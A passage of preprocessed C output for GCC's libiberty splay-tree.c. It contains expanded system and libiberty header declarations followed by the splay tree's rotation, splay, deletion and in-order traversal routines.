extern int printf (const char *__restrict __format, ...);
extern int sprintf (char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__));
extern int vfprintf (FILE *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg);
extern int vprintf (const char *__restrict __format, __gnuc_va_list __arg);
extern int vsprintf (char *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg) __attribute__ ((__nothrow__));
extern int snprintf (char *__restrict __s, size_t __maxlen,
const char *__restrict __format, ...)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 4)));
extern int vsnprintf (char *__restrict __s, size_t __maxlen,
const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 0)));
extern int vasprintf (char **__restrict __ptr, const char *__restrict __f,
__gnuc_va_list __arg)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 2, 0))) ;
extern int __asprintf (char **__restrict __ptr,
const char *__restrict __fmt, ...)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 2, 3))) ;
extern int asprintf (char **__restrict __ptr,
const char *__restrict __fmt, ...)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 2, 3))) ;
extern int vdprintf (int __fd, const char *__restrict __fmt,
__gnuc_va_list __arg)
__attribute__ ((__format__ (__printf__, 2, 0)));
extern int dprintf (int __fd, const char *__restrict __fmt, ...)
__attribute__ ((__format__ (__printf__, 2, 3)));
extern int fscanf (FILE *__restrict __stream,
const char *__restrict __format, ...) ;
extern int scanf (const char *__restrict __format, ...) ;
extern int sscanf (const char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__ , __leaf__));
extern int fscanf (FILE *__restrict __stream, const char *__restrict __format, ...) __asm__ ("" "__isoc99_fscanf")
;
extern int scanf (const char *__restrict __format, ...) __asm__ ("" "__isoc99_scanf")
;
extern int sscanf (const char *__restrict __s, const char *__restrict __format, ...) __asm__ ("" "__isoc99_sscanf") __attribute__ ((__nothrow__ , __leaf__))
;
# 432 "/usr/include/stdio.h" 3 4
extern int vfscanf (FILE *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg)
__attribute__ ((__format__ (__scanf__, 2, 0))) ;
extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__format__ (__scanf__, 1, 0))) ;
extern int vsscanf (const char *__restrict __s,
const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__format__ (__scanf__, 2, 0)));
extern int vfscanf (FILE *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vfscanf")
__attribute__ ((__format__ (__scanf__, 2, 0))) ;
extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vscanf")
__attribute__ ((__format__ (__scanf__, 1, 0))) ;
extern int vsscanf (const char *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vsscanf") __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__format__ (__scanf__, 2, 0)));
# 485 "/usr/include/stdio.h" 3 4
extern int fgetc (FILE *__stream);
extern int getc (FILE *__stream);
extern int getchar (void);
extern int getc_unlocked (FILE *__stream);
extern int getchar_unlocked (void);
# 510 "/usr/include/stdio.h" 3 4
extern int fgetc_unlocked (FILE *__stream);
# 521 "/usr/include/stdio.h" 3 4
extern int fputc (int __c, FILE *__stream);
extern int putc (int __c, FILE *__stream);
extern int putchar (int __c);
# 537 "/usr/include/stdio.h" 3 4
extern int fputc_unlocked (int __c, FILE *__stream);
extern int putc_unlocked (int __c, FILE *__stream);
extern int putchar_unlocked (int __c);
extern int getw (FILE *__stream);
extern int putw (int __w, FILE *__stream);
extern char *fgets (char *__restrict __s, int __n, FILE *__restrict __stream)
;
# 587 "/usr/include/stdio.h" 3 4
extern char *fgets_unlocked (char *__restrict __s, int __n,
FILE *__restrict __stream) ;
# 603 "/usr/include/stdio.h" 3 4
extern __ssize_t __getdelim (char **__restrict __lineptr,
size_t *__restrict __n, int __delimiter,
FILE *__restrict __stream) ;
extern __ssize_t getdelim (char **__restrict __lineptr,
size_t *__restrict __n, int __delimiter,
FILE *__restrict __stream) ;
extern __ssize_t getline (char **__restrict __lineptr,
size_t *__restrict __n,
FILE *__restrict __stream) ;
extern int fputs (const char *__restrict __s, FILE *__restrict __stream);
extern int puts (const char *__s);
extern int ungetc (int __c, FILE *__stream);
extern size_t fread (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) ;
extern size_t fwrite (const void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __s);
# 662 "/usr/include/stdio.h" 3 4
extern int fputs_unlocked (const char *__restrict __s,
FILE *__restrict __stream);
# 673 "/usr/include/stdio.h" 3 4
extern size_t fread_unlocked (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) ;
extern size_t fwrite_unlocked (const void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream);
extern int fseek (FILE *__stream, long int __off, int __whence);
extern long int ftell (FILE *__stream) ;
extern void rewind (FILE *__stream);
# 707 "/usr/include/stdio.h" 3 4
extern int fseeko (FILE *__stream, __off_t __off, int __whence);
extern __off_t ftello (FILE *__stream) ;
# 731 "/usr/include/stdio.h" 3 4
extern int fgetpos (FILE *__restrict __stream, fpos_t *__restrict __pos);
extern int fsetpos (FILE *__stream, const fpos_t *__pos);
# 750 "/usr/include/stdio.h" 3 4
extern int fseeko64 (FILE *__stream, __off64_t __off, int __whence);
extern __off64_t ftello64 (FILE *__stream) ;
extern int fgetpos64 (FILE *__restrict __stream, fpos64_t *__restrict __pos);
extern int fsetpos64 (FILE *__stream, const fpos64_t *__pos);
extern void clearerr (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int feof (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ferror (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void clearerr_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int feof_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ferror_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void perror (const char *__s);
# 1 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 1 3 4
# 26 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 3 4
extern int sys_nerr;
extern const char *const sys_errlist[];
extern int _sys_nerr;
extern const char *const _sys_errlist[];
# 782 "/usr/include/stdio.h" 2 3 4
extern int fileno (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int fileno_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
# 800 "/usr/include/stdio.h" 3 4
extern FILE *popen (const char *__command, const char *__modes) ;
extern int pclose (FILE *__stream);
extern char *ctermid (char *__s) __attribute__ ((__nothrow__ , __leaf__));
extern char *cuserid (char *__s);
struct obstack;
extern int obstack_printf (struct obstack *__restrict __obstack,
const char *__restrict __format, ...)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 2, 3)));
extern int obstack_vprintf (struct obstack *__restrict __obstack,
const char *__restrict __format,
__gnuc_va_list __args)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 2, 0)));
extern void flockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int ftrylockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void funlockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
# 858 "/usr/include/stdio.h" 3 4
extern int __uflow (FILE *);
extern int __overflow (FILE *, int);
# 1 "/usr/include/x86_64-linux-gnu/bits/stdio.h" 1 3 4
# 38 "/usr/include/x86_64-linux-gnu/bits/stdio.h" 3 4
extern __inline __attribute__ ((__gnu_inline__)) int
vprintf (const char *__restrict __fmt, __gnuc_va_list __arg)
{
return vfprintf (stdout, __fmt, __arg);
}
extern __inline __attribute__ ((__gnu_inline__)) int
getchar (void)
{
return getc (stdin);
}
extern __inline __attribute__ ((__gnu_inline__)) int
fgetc_unlocked (FILE *__fp)
{
return (__builtin_expect (((__fp)->_IO_read_ptr >= (__fp)->_IO_read_end), 0) ? __uflow (__fp) : *(unsigned char *) (__fp)->_IO_read_ptr++);
}
extern __inline __attribute__ ((__gnu_inline__)) int
getc_unlocked (FILE *__fp)
{
return (__builtin_expect (((__fp)->_IO_read_ptr >= (__fp)->_IO_read_end), 0) ? __uflow (__fp) : *(unsigned char *) (__fp)->_IO_read_ptr++);
}
extern __inline __attribute__ ((__gnu_inline__)) int
getchar_unlocked (void)
{
return (__builtin_expect (((stdin)->_IO_read_ptr >= (stdin)->_IO_read_end), 0) ? __uflow (stdin) : *(unsigned char *) (stdin)->_IO_read_ptr++);
}
extern __inline __attribute__ ((__gnu_inline__)) int
putchar (int __c)
{
return putc (__c, stdout);
}
extern __inline __attribute__ ((__gnu_inline__)) int
fputc_unlocked (int __c, FILE *__stream)
{
return (__builtin_expect (((__stream)->_IO_write_ptr >= (__stream)->_IO_write_end), 0) ? __overflow (__stream, (unsigned char) (__c)) : (unsigned char) (*(__stream)->_IO_write_ptr++ = (__c)));
}
extern __inline __attribute__ ((__gnu_inline__)) int
putc_unlocked (int __c, FILE *__stream)
{
return (__builtin_expect (((__stream)->_IO_write_ptr >= (__stream)->_IO_write_end), 0) ? __overflow (__stream, (unsigned char) (__c)) : (unsigned char) (*(__stream)->_IO_write_ptr++ = (__c)));
}
extern __inline __attribute__ ((__gnu_inline__)) int
putchar_unlocked (int __c)
{
return (__builtin_expect (((stdout)->_IO_write_ptr >= (stdout)->_IO_write_end), 0) ? __overflow (stdout, (unsigned char) (__c)) : (unsigned char) (*(stdout)->_IO_write_ptr++ = (__c)));
}
extern __inline __attribute__ ((__gnu_inline__)) __ssize_t
getline (char **__lineptr, size_t *__n, FILE *__stream)
{
return __getdelim (__lineptr, __n, '\n', __stream);
}
extern __inline __attribute__ ((__gnu_inline__)) int
__attribute__ ((__nothrow__ , __leaf__)) feof_unlocked (FILE *__stream)
{
return (((__stream)->_flags & 0x0010) != 0);
}
extern __inline __attribute__ ((__gnu_inline__)) int
__attribute__ ((__nothrow__ , __leaf__)) ferror_unlocked (FILE *__stream)
{
return (((__stream)->_flags & 0x0020) != 0);
}
# 865 "/usr/include/stdio.h" 2 3 4
# 873 "/usr/include/stdio.h" 3 4
# 39 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 2
# 1 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h" 1
# 42 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
# 1 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/ansidecl.h" 1
# 43 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h" 2
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 1 3 4
# 143 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 3 4
typedef long int ptrdiff_t;
# 415 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 3 4
typedef struct {
long long __max_align_ll __attribute__((__aligned__(__alignof__(long long))));
long double __max_align_ld __attribute__((__aligned__(__alignof__(long double))));
# 426 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 3 4
} max_align_t;
# 46 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h" 2
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stdarg.h" 1 3 4
# 48 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h" 2
# 55 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern void unlock_stream (FILE *);
extern void unlock_std_streams (void);
extern FILE *fopen_unlocked (const char *, const char *);
extern FILE *fdopen_unlocked (int, const char *);
extern FILE *freopen_unlocked (const char *, const char *, FILE *);
extern char **buildargv (const char *) __attribute__ ((__malloc__));
extern void freeargv (char **);
extern char **dupargv (char * const *) __attribute__ ((__malloc__));
extern void expandargv (int *, char ***);
extern int writeargv (char * const *, FILE *);
extern int countargv (char * const *);
# 123 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern const char *lbasename (const char *) __attribute__ ((__returns_nonnull__)) __attribute__ ((__nonnull__ (1)));
extern const char *dos_lbasename (const char *) __attribute__ ((__returns_nonnull__)) __attribute__ ((__nonnull__ (1)));
extern const char *unix_lbasename (const char *) __attribute__ ((__returns_nonnull__)) __attribute__ ((__nonnull__ (1)));
extern char *lrealpath (const char *);
extern int is_valid_fd (int fd);
extern char *concat (const char *, ...) __attribute__ ((__malloc__)) __attribute__ ((__returns_nonnull__)) __attribute__ ((__sentinel__));
# 157 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern char *reconcat (char *, const char *, ...) __attribute__ ((__malloc__)) __attribute__ ((__returns_nonnull__)) __attribute__ ((__sentinel__));
extern unsigned long concat_length (const char *, ...) __attribute__ ((__sentinel__));
extern char *concat_copy (char *, const char *, ...) __attribute__ ((__returns_nonnull__)) __attribute__ ((__nonnull__ (1))) __attribute__ ((__sentinel__));
extern char *concat_copy2 (const char *, ...) __attribute__ ((__returns_nonnull__)) __attribute__ ((__sentinel__));
extern char *libiberty_concat_ptr;
# 193 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern int fdmatch (int fd1, int fd2);
# 205 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern char * getpwd (void);
# 218 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern long get_run_time (void);
extern char *make_relative_prefix (const char *, const char *,
const char *) __attribute__ ((__malloc__));
extern char *make_relative_prefix_ignore_links (const char *, const char *,
const char *) __attribute__ ((__malloc__));
extern const char *choose_tmpdir (void) __attribute__ ((__returns_nonnull__));
extern char *choose_temp_base (void) __attribute__ ((__malloc__)) __attribute__ ((__returns_nonnull__));
extern char *make_temp_file (const char *) __attribute__ ((__malloc__));
extern char *make_temp_file_with_prefix (const char *, const char *) __attribute__ ((__malloc__));
extern int unlink_if_ordinary (const char *);
extern const char *spaces (int count);
extern int errno_max (void);
extern const char *strerrno (int);
extern int strtoerrno (const char *);
extern char *xstrerror (int) __attribute__ ((__returns_nonnull__));
extern int signo_max (void);
# 292 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern const char *strsigno (int);
extern int strtosigno (const char *);
extern int xatexit (void (*fn) (void));
extern void xexit (int status) __attribute__ ((__noreturn__));
extern void xmalloc_set_program_name (const char *);
extern void xmalloc_failed (size_t) __attribute__ ((__noreturn__));
extern void *xmalloc (size_t) __attribute__ ((__malloc__)) __attribute__ ((__returns_nonnull__)) __attribute__ ((alloc_size (1))) __attribute__ ((warn_unused_result));
extern void *xrealloc (void *, size_t) __attribute__ ((__returns_nonnull__)) __attribute__ ((alloc_size (2))) __attribute__ ((warn_unused_result));
extern void *xcalloc (size_t, size_t) __attribute__ ((__malloc__)) __attribute__ ((__returns_nonnull__)) __attribute__ ((alloc_size (1, 2))) __attribute__ ((warn_unused_result));
extern char *xstrdup (const char *) __attribute__ ((__malloc__)) __attribute__ ((__returns_nonnull__)) __attribute__ ((warn_unused_result));
extern char *xstrndup (const char *, size_t) __attribute__ ((__malloc__)) __attribute__ ((__returns_nonnull__)) __attribute__ ((warn_unused_result));
extern void *xmemdup (const void *, size_t, size_t) __attribute__ ((__malloc__)) __attribute__ ((__returns_nonnull__)) __attribute__ ((warn_unused_result));
extern double physmem_total (void);
extern double physmem_available (void);
extern unsigned int xcrc32 (const unsigned char *, int, unsigned int);
# 391 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern const unsigned char _hex_value[256];
extern void hex_init (void);
# 428 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern struct pex_obj *pex_init (int flags, const char *pname,
const char *tempbase) __attribute__ ((__returns_nonnull__));
# 528 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern const char *pex_run (struct pex_obj *obj, int flags,
const char *executable, char * const *argv,
const char *outname, const char *errname,
int *err);
# 543 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern const char *pex_run_in_environment (struct pex_obj *obj, int flags,
const char *executable,
char * const *argv,
char * const *env,
const char *outname,
const char *errname, int *err);
extern FILE *pex_input_file (struct pex_obj *obj, int flags,
const char *in_name);
extern FILE *pex_input_pipe (struct pex_obj *obj, int binary);
extern FILE *pex_read_output (struct pex_obj *, int binary);
extern FILE *pex_read_err (struct pex_obj *, int binary);
extern int pex_get_status (struct pex_obj *, int count, int *vector);
struct pex_time
{
unsigned long user_seconds;
unsigned long user_microseconds;
unsigned long system_seconds;
unsigned long system_microseconds;
};
extern int pex_get_times (struct pex_obj *, int count,
struct pex_time *vector);
extern void pex_free (struct pex_obj *);
# 618 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern const char *pex_one (int flags, const char *executable,
char * const *argv, const char *pname,
const char *outname, const char *errname,
int *status, int *err);
# 637 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern int pexecute (const char *, char * const *, const char *,
const char *, char **, char **, int);
extern int pwait (int, int *, int);
extern void *bsearch_r (const void *, const void *,
size_t, size_t,
int (*)(const void *, const void *, void *),
void *);
# 661 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern char *xasprintf (const char *, ...) __attribute__ ((__malloc__)) __attribute__ ((__format__ (__printf__, 1, 2))) __attribute__ ((__nonnull__ (1)));
# 673 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern char *xvasprintf (const char *, va_list) __attribute__ ((__malloc__)) __attribute__ ((__format__ (__printf__, 1, 0))) __attribute__ ((__nonnull__ (1)));
# 722 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern void setproctitle (const char *name, ...);
extern void stack_limit_increase (unsigned long);
# 735 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/libiberty.h"
extern void *C_alloca (size_t) __attribute__ ((__malloc__));
# 41 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 2
# 1 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/splay-tree.h" 1
# 40 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/splay-tree.h"
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stdint.h" 1 3 4
# 9 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stdint.h" 3 4
# 1 "/usr/include/stdint.h" 1 3 4
# 26 "/usr/include/stdint.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 27 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wchar.h" 1 3 4
# 29 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 30 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4
typedef __uint8_t uint8_t;
typedef __uint16_t uint16_t;
typedef __uint32_t uint32_t;
typedef __uint64_t uint64_t;
# 38 "/usr/include/stdint.h" 2 3 4
typedef __int_least8_t int_least8_t;
typedef __int_least16_t int_least16_t;
typedef __int_least32_t int_least32_t;
typedef __int_least64_t int_least64_t;
typedef __uint_least8_t uint_least8_t;
typedef __uint_least16_t uint_least16_t;
typedef __uint_least32_t uint_least32_t;
typedef __uint_least64_t uint_least64_t;
typedef signed char int_fast8_t;
typedef long int int_fast16_t;
typedef long int int_fast32_t;
typedef long int int_fast64_t;
# 71 "/usr/include/stdint.h" 3 4
typedef unsigned char uint_fast8_t;
typedef unsigned long int uint_fast16_t;
typedef unsigned long int uint_fast32_t;
typedef unsigned long int uint_fast64_t;
# 87 "/usr/include/stdint.h" 3 4
typedef long int intptr_t;
typedef unsigned long int uintptr_t;
# 101 "/usr/include/stdint.h" 3 4
typedef __intmax_t intmax_t;
typedef __uintmax_t uintmax_t;
# 10 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stdint.h" 2 3 4
# 41 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/splay-tree.h" 2
# 1 "/usr/include/inttypes.h" 1 3 4
# 34 "/usr/include/inttypes.h" 3 4
typedef int __gwchar_t;
# 266 "/usr/include/inttypes.h" 3 4
typedef struct
{
long int quot;
long int rem;
} imaxdiv_t;
# 290 "/usr/include/inttypes.h" 3 4
extern intmax_t imaxabs (intmax_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern imaxdiv_t imaxdiv (intmax_t __numer, intmax_t __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern intmax_t strtoimax (const char *__restrict __nptr,
char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__));
extern uintmax_t strtoumax (const char *__restrict __nptr,
char ** __restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__));
extern intmax_t wcstoimax (const __gwchar_t *__restrict __nptr,
__gwchar_t **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__));
extern uintmax_t wcstoumax (const __gwchar_t *__restrict __nptr,
__gwchar_t ** __restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__));
extern long int __strtol_internal (const char *__restrict __nptr,
char **__restrict __endptr,
int __base, int __group)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern __inline __attribute__ ((__gnu_inline__)) intmax_t
__attribute__ ((__nothrow__ , __leaf__)) strtoimax (const char *__restrict nptr, char **__restrict endptr, int base)
{
return __strtol_internal (nptr, endptr, base, 0);
}
extern unsigned long int __strtoul_internal (const char *__restrict __nptr,
char ** __restrict __endptr,
int __base, int __group)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern __inline __attribute__ ((__gnu_inline__)) uintmax_t
__attribute__ ((__nothrow__ , __leaf__)) strtoumax (const char *__restrict nptr, char **__restrict endptr, int base)
{
return __strtoul_internal (nptr, endptr, base, 0);
}
extern long int __wcstol_internal (const __gwchar_t * __restrict __nptr,
__gwchar_t **__restrict __endptr,
int __base, int __group)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern __inline __attribute__ ((__gnu_inline__)) intmax_t
__attribute__ ((__nothrow__ , __leaf__)) wcstoimax (const __gwchar_t *__restrict nptr, __gwchar_t **__restrict endptr, int base)
{
return __wcstol_internal (nptr, endptr, base, 0);
}
extern unsigned long int __wcstoul_internal (const __gwchar_t *
__restrict __nptr,
__gwchar_t **
__restrict __endptr,
int __base, int __group)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern __inline __attribute__ ((__gnu_inline__)) uintmax_t
__attribute__ ((__nothrow__ , __leaf__)) wcstoumax (const __gwchar_t *__restrict nptr, __gwchar_t **__restrict endptr, int base)
{
return __wcstoul_internal (nptr, endptr, base, 0);
}
# 432 "/usr/include/inttypes.h" 3 4
# 44 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/splay-tree.h" 2
# 50 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/splay-tree.h"
typedef uintptr_t splay_tree_key;
typedef uintptr_t splay_tree_value;
typedef struct splay_tree_node_s *splay_tree_node;
typedef int (*splay_tree_compare_fn) (splay_tree_key, splay_tree_key);
# 67 "/home/giulianob/gcc_git_gnu/gcc/libiberty/../include/splay-tree.h"
typedef void (*splay_tree_delete_key_fn) (splay_tree_key);
typedef void (*splay_tree_delete_value_fn) (splay_tree_value);
typedef int (*splay_tree_foreach_fn) (splay_tree_node, void*);
typedef void *(*splay_tree_allocate_fn) (int, void *);
typedef void (*splay_tree_deallocate_fn) (void *, void *);
struct splay_tree_node_s {
splay_tree_key key;
splay_tree_value value;
splay_tree_node left;
splay_tree_node right;
};
struct splay_tree_s {
splay_tree_node root;
splay_tree_compare_fn comp;
splay_tree_delete_key_fn delete_key;
splay_tree_delete_value_fn delete_value;
splay_tree_allocate_fn allocate;
splay_tree_deallocate_fn deallocate;
void *allocate_data;
};
typedef struct splay_tree_s *splay_tree;
extern splay_tree splay_tree_new (splay_tree_compare_fn,
splay_tree_delete_key_fn,
splay_tree_delete_value_fn);
extern splay_tree splay_tree_new_with_allocator (splay_tree_compare_fn,
splay_tree_delete_key_fn,
splay_tree_delete_value_fn,
splay_tree_allocate_fn,
splay_tree_deallocate_fn,
void *);
extern splay_tree splay_tree_new_typed_alloc (splay_tree_compare_fn,
splay_tree_delete_key_fn,
splay_tree_delete_value_fn,
splay_tree_allocate_fn,
splay_tree_allocate_fn,
splay_tree_deallocate_fn,
void *);
extern void splay_tree_delete (splay_tree);
extern splay_tree_node splay_tree_insert (splay_tree,
splay_tree_key,
splay_tree_value);
extern void splay_tree_remove (splay_tree, splay_tree_key);
extern splay_tree_node splay_tree_lookup (splay_tree, splay_tree_key);
extern splay_tree_node splay_tree_predecessor (splay_tree, splay_tree_key);
extern splay_tree_node splay_tree_successor (splay_tree, splay_tree_key);
extern splay_tree_node splay_tree_max (splay_tree);
extern splay_tree_node splay_tree_min (splay_tree);
extern int splay_tree_foreach (splay_tree, splay_tree_foreach_fn, void*);
extern int splay_tree_compare_ints (splay_tree_key, splay_tree_key);
extern int splay_tree_compare_pointers (splay_tree_key, splay_tree_key);
extern int splay_tree_compare_strings (splay_tree_key, splay_tree_key);
extern void splay_tree_delete_pointers (splay_tree_value);
# 42 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 2
static void splay_tree_delete_helper (splay_tree, splay_tree_node);
static inline void rotate_left (splay_tree_node *,
splay_tree_node, splay_tree_node);
static inline void rotate_right (splay_tree_node *,
splay_tree_node, splay_tree_node);
static void splay_tree_splay (splay_tree, splay_tree_key);
static int splay_tree_foreach_helper (splay_tree_node,
splay_tree_foreach_fn, void*);
static void
splay_tree_delete_helper (splay_tree sp, splay_tree_node node)
{
splay_tree_node pending = 0;
splay_tree_node active = 0;
if (!node)
return;
if (sp->delete_key) (*sp->delete_key)(node->key);;
if (sp->delete_value) (*sp->delete_value)(node->value);;
node->key = (splay_tree_key)pending;
pending = (splay_tree_node)node;
while (pending)
{
active = pending;
pending = 0;
while (active)
{
splay_tree_node temp;
if (active->left)
{
if (sp->delete_key) (*sp->delete_key)(active->left->key);;
if (sp->delete_value) (*sp->delete_value)(active->left->value);;
active->left->key = (splay_tree_key)pending;
pending = (splay_tree_node)(active->left);
}
if (active->right)
{
if (sp->delete_key) (*sp->delete_key)(active->right->key);;
if (sp->delete_value) (*sp->delete_value)(active->right->value);;
active->right->key = (splay_tree_key)pending;
pending = (splay_tree_node)(active->right);
}
temp = active;
active = (splay_tree_node)(temp->key);
(*sp->deallocate) ((char*) temp, sp->allocate_data);
}
}
}
static inline void
rotate_left (splay_tree_node *pp, splay_tree_node p, splay_tree_node n)
{
splay_tree_node tmp;
tmp = n->right;
n->right = p;
p->left = tmp;
*pp = n;
}
static inline void
rotate_right (splay_tree_node *pp, splay_tree_node p, splay_tree_node n)
{
splay_tree_node tmp;
tmp = n->left;
n->left = p;
p->right = tmp;
*pp = n;
}
static void
splay_tree_splay (splay_tree sp, splay_tree_key key)
{
if (sp->root == 0)
return;
do {
int cmp1, cmp2;
splay_tree_node n, c;
n = sp->root;
cmp1 = (*sp->comp) (key, n->key);
if (cmp1 == 0)
return;
if (cmp1 < 0)
c = n->left;
else
c = n->right;
if (!c)
return;
cmp2 = (*sp->comp) (key, c->key);
if (cmp2 == 0
|| (cmp2 < 0 && !c->left)
|| (cmp2 > 0 && !c->right))
{
if (cmp1 < 0)
rotate_left (&sp->root, n, c);
else
rotate_right (&sp->root, n, c);
return;
}
if (cmp1 < 0 && cmp2 < 0)
{
rotate_left (&n->left, c, c->left);
rotate_left (&sp->root, n, n->left);
}
else if (cmp1 > 0 && cmp2 > 0)
{
rotate_right (&n->right, c, c->right);
rotate_right (&sp->root, n, n->right);
}
else if (cmp1 < 0 && cmp2 > 0)
{
rotate_right (&n->left, c, c->right);
rotate_left (&sp->root, n, n->left);
}
else if (cmp1 > 0 && cmp2 < 0)
{
rotate_left (&n->right, c, c->left);
rotate_right (&sp->root, n, n->right);
}
} while (1);
}
static int
splay_tree_foreach_helper (splay_tree_node node,
splay_tree_foreach_fn fn, void *data)
{
int val;
splay_tree_node *stack;
int stack_ptr, stack_size;
stack_size = 100;
stack_ptr = 0;
stack = ((splay_tree_node *) xmalloc (sizeof (splay_tree_node) * (stack_size)));
val = 0;
for (;;)
{
while (node !=
# 228 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 3 4
((void *)0)
# 228 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
)
{
if (stack_ptr == stack_size)
{
stack_size *= 2;
stack = ((splay_tree_node *) xrealloc ((void *) (stack), sizeof (splay_tree_node) * (stack_size)));
}
stack[stack_ptr++] = node;
node = node->left;
}
if (stack_ptr == 0)
break;
node = stack[--stack_ptr];
val = (*fn) (node, data);
if (val)
break;
node = node->right;
}
free ((void*) (stack));
return val;
}
static void *
